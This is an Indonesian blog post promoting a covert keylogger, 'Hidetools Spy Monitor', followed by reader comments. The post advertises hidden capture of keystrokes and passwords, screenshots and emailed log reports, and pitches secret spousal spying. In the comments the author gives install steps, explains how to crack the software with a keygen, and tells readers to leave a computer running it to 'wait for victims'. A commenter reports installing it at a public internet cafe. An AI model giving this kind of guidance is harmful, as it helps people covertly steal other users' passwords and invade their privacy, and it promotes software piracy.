Selamat Datang di Cafe Digital

Artikel-artikel dibawah ini hanya ditujukan untuk edukasi dan berbagi ilmu. Jika terjadi penyalahgunaan terhadap artikel ini, penulis tidak bertanggung jawab.


“Pembunuhan dengan pisau dapur adalah 100% kesalahan pelaku pembunuhan dan bukan kesalahan sang pembuat pisau”.

Hidetools Spy Monitor (Keylogger Tercanggih Masa Kini)

Ditulis oleh Zinedine Zahid on Rabu, 19 Januari 2011

Hidetools Spy Monitor adalah spy software komputer dan membuat catatan secara diam-diam. Hidetools Spy Monitor dapat secara otomatis membuat laporan log dan mengirimnya ke alamat email Anda. Hal ini memungkinkan Anda untuk memonitor PC anda dari setiap tempat di mana Anda dapat memeriksa email Anda.


Fitur:
Spy Monitor Hidetools menyediakan banyak fitur pemantauan komputer penting.
Hal ini mudah digunakan dan software monitoring ini meliputi keylogger, mengambil screenshot, program dan website penebangan, pemantauan aktivitas komputer.

  1. Keystrokes Typed, Spy Monitor diam-diam Hidetools catatan setiap penekanan tombol diketik di komputer Anda bersama aplikasi judul dan waktu. Juga, memungkinkan Anda untuk merekam password dengan mudah. Setiap pengguna dapat dipantau.
  2. Website Dikunjungi, Spy Monitor Hidetools catatan semua alamat situs web (URL) bersama dengan judul situs dan tanggal / waktu kunjungan. Program mendukung versi terbaru dari browser Internet Explorer, Netscape, Opera, Mozilla Firefox dan America Online.
  3. Aplikasi Kegiatan Logging, Spy Monitor Hidetools melacak semua program yang digunakan pada komputer Anda. Log juga termasuk ketika aplikasi diaktifkan, berhenti, dan berapa lama itu benar-benar digunakan. 
  4. Capturing Screenshot, Spy Monitor Hidetools menangkap screenshot dari layar komputer pada interval yang ditentukan oleh Anda. Screenshot dapat menangkap sesering sekali per menit. Melihat apa yang pengguna lakukan pada waktu itu!!! 
  5. Komputer Activity, Software ini mengontrol waktu yang dihabiskan pengguna di komputer Anda. Spy Monitor Hidetools log semua aktivitas sistem (shutdowns dan pengguna logons). 
  6. Remote Monitoring, Perangkat lunak mata-mata dapat secara otomatis mengirim laporan log ke alamat email Anda. Ini memungkinkan Anda untuk memonitor PC anda dari setiap tempat di mana Anda bisa mengecek email Anda. Anda dapat termasuk atau semua pilihan laporan, yang memungkinkan Anda untuk mengirim hanya aktivitas yang Anda inginkan ke email anda. 
  7. Program Hidden, Program bekerja diam-diam dan tak seorang pun bisa mendeteksinya. Hanya Anda akan tahu bahwa mata-mata Monitor diinstal!!! 
  8. Password Protection, Hidetools Spy Monitor dilindungi dengan sandi untuk mencegah pemantauan mematikan dan pilihan perubahan. Hanya orang yang mengetahui hotkey khusus dan password dapat mengakses software ini. 
  9. Support for Windows Vista, Program ini dirancang untuk Windows Vista/98/2000/NT/XP. 
  10. Parental Control, Banyak orangtua khawatir apa yang anak-anak mereka lakukan di komputer. Apakah mereka melakukan pekerjaan rumah atau bermain? Tua ingin melindungi mereka dari percakapan dengan orang asing, penyerangan website dan sebagainya. Dengan Hidetools Spy Monitor Anda akan dapat melihat semua anak-anak Anda aktivitas komputer dan mendeteksi masalah.
  11. Karyawan Monitoring, Komputer adalah sarana utama kerja dan sarana utama hiburan. Sekarang majikan telah kecemasan baru - instant messenger, surfing internet, on-line games, e-mail, chatting, situs porno, dll Dengan program ini, Anda akan menemukan masalah dengan para karyawan, mencegah informasi penting pencurian, meningkatkan disiplin dan meningkatkan produktivitas perusahaan anda!
  12. Pasangan Monitoring, Pasangan monitoring software adalah cara termudah untuk menemukan kebenaran tentang pasangan Anda dan mengungkap kecurigaan. Spy Monitor Hidetools sama sekali tidak terlihat sehingga adalah yang paling berbahaya metode. Anda hanya perlu menginstal software ini dan laporan log rinci akan dikirim ke alamat e-mail. Apa yang dapat menjadi cara yang lebih mudah untuk menghilangkan kecurigaan Anda yang merusak hubungan?
  13. Sekolah dan Institusi, Software ini membantu lembaga-lembaga publik untuk mencegah penggunaan komputer yang tidak cocok dan komputer Wreckers. 
  14. Kontrol Pribadi, Dengan Hidetools Spy Monitor Anda dapat melacak jika komputer Anda digunakan tanpa izin Anda saat Anda sedang pergi dan bagaimana. Hal ini memungkinkan Anda untuk melindungi privasi dan keamanan Anda.
  15. File Backup, Menggunakan Hidetools Spy Monitor Anda dapat menghemat waktu Anda dengan mencegah kerusakan data insidentil.
Untuk Contoh: Anda dapat mengembalikan teks yang diketik, mengunjungi situs web dan sebagainya.

Untuk download softwarenya klik disini.

{ 14 komentar... read them below or add one }

Pengantar Teknologi Informasi mengatakan...

Gan Tolong donk...,Spy monitor aq slalu gak bisa mengirim ke email yang aq tentukan.,aq g tw..,apa aq yang salah atau PC aq. mohon donk bantuannya..

Zinedine Zahid mengatakan...

Saya sudah coba bisa kok mas,, caranya :

1. klik email log delivery
2. akan keluar jendela setting email, dan centang Send Logs via E-Mail
3. Pada coloum Send E-Mail To,, isikan email anda (email yang untuk mengirim log) ?!
4. Pada coloum E-Mail Subject isikan "Hidetools Spy Monitor Report"
5. Pada coloum Send Every isikan setiap berapa jam log itu di kirim ke anda ?!
6. Jika sudah coba klik Test,, lalu cek email anda !!! (biasanya dari kevin-hale@yandex.ru

Selamat Mencoba Semoga Berhasil !!!

Anonim mengatakan...

om gimana cara menggunakannya?

bantu saya ya om..
email ke anklau@ymail.com

nice blog om..
:)

Zinedine Zahid mengatakan...

@^ : Cara sudah saya kirim ke email anda dari mail4_zahid@hackermail.com,, tetapi supaya tidak banyak yang bertanya lagi cara menggunakan software ini, saya tulis saja di sini.
Cara Penginstalan :

1. Extract SpyMonitor.zip
2. Klik hsm_install.exe pada folder setup
3. Akan muncul jendela baru, klik next
4. Lingkari I accept the terms in the License Agreement, klik next
5. Klik Install (tunggu sampai proses penginstalan selesai)
6. Klik Finish

Sekarang Program Keylogger sudah terinstal, tetapi belum full version,, supaya menjadi full version ikuti langkah-langkah berikut :

1. Jalankan keygen.exe di folder keygen
2. Akan muncul jendela baru, Klik Generate
3. Copy serial
4. Klik register di Program Spy Monitor
5. Klik OK

Sekarang Program Keylogger sudah menjadi full version ?!
Untuk merekam email, password, kata-kata yang diketik, website yang di kunjungi, Screenshoots, program yang digunakan, dll bisa mengklik salah satu menu yang ada di Software tersebut. Misalnya ingin mengetahui Password, email, dan kata yang diketik, klik Keystokes Typed. Maka akan muncul jendela baru, dan dibawah ada kalimat yang di tulis, seperti email, password, dll. Jika sudah anda silang program Spy monitor tersebut. Lalu tinggalkan komputer tersebut untuk menunggu korban yang masuk. Jika korban sudah terperangkap tekan tombol pada keyboar Ctrl + F1. Maka secara otomatis akan keluar jendela Keylogger.
Ingat Artikel yang saya tulis ini hanya ditujukan untuk edukasi dan berbagi ilmu. Jika terjadi penyalahgunaan terhadap artikel ini, penulis tidak akan bertanggung jawab. Use for knowledge !!! O.K

Anonim mengatakan...

thank's bang...
tapi masih ada masalah lagi ni..
koq laporan ke email saya ga ada ya?
saya udeh setting /1jam ngrim laporan tapi koq ga masuk"... ntar saya buka trus saya klik tombol test baru tuh dia ngasih laporan..

gimana cara buat biar dia bisa ngasih laporan tanpa tmbol test..
kalau auto dia ga mau mas...
pdahal udeh nungguin 2 hari tuh..
masa mesti buka lagi keylogernya di warnet situ.
:(
tolong dibantu ya bang..
#tkp. warnet deket rumah saya..

Pengantar Teknologi Informasi mengatakan...

Udah mas..,aq udah lakukan apa yang mas bilang..,Apabila aq Click Tombol Test, emang ada email masuk di yahoo saya.,Tetapi bagaimana seperti yg di katakan frankhyfirmansyah ,laporan Atau LOG ny itu tidak pernah bisa melakukan pengiriman otomatis. Saya Sudah bertanya kesana dan kesini, Tetapi Sampai saat ini belum ada yang bisa membantu saya untuk memberi Solusi yang pasti, Saya harap Mas Dapat membantu saya. Terimakasih. Saya tunggu Di email saya Aryosky@yahoo.co.id.

Unknown mengatakan...

kok g bisa keygennya bos??g fungsi,invalid terus..
mohon pencerahannya

Unknown mengatakan...

asli gan ..
ane dh cri kmna' th byar th logs k'krim sndri v ttp az ad .. n gk bsa' ...
please gan pencerahan ....

My Blog Purpleblue mengatakan...

gan keygen.nya serinya yang mana nihhh ?
banyak banget nmernya kalau di generate
trima kasih

barang serbaguna mengatakan...

gan.

buleh kut kursus ngehack k qm t???

mars_3v3nT'z mengatakan...

mas..minta cara penggunaannya donk..boleh minta dikirimin via email nggak mas..ni email saya : marseventz@rocketmail.com
makasih..

atsyan mengatakan...

bisa gk gan kegiatan yg di rekam keylog ini gk di kirim ke email, tapi hasil nya langsung bisa di lihat di kompi??

Unknown mengatakan...
Komentar ini telah dihapus oleh pengarang.
Unknown mengatakan...

mas minta cara penggunaannya dong tolong kirim ke e-mail saya kaketua23@gmail.com pliizz kasih tau g bisa nih ada tulisan

E-Mail Log Delivery Error
Socket Error # 10060
Connection Time Out

Posting Komentar